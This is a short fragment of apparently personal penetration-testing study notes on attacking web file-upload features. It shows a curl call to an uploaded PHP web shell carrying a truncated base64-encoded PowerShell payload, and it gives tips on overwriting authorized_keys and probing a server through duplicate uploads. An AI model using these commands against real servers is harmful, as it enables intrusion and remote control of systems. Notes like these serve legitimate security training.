justeslam/offsec2/checklists/http.md

 kali@kali:~$ curl http://example.com/subdir/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAG...
 ```

+- See if you can overwrite files, such as authorized_keys.
+Worst case, you may get information about the web stack

 19. File Upload Vulns (Non-Executable)

 - When testing a file upload form, we should always determine what happens when a file is uploaded twice.
 If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server.
 Alternatively, if the web application displays an error message, this may provide valuable information such as the programming language or web technologies in use.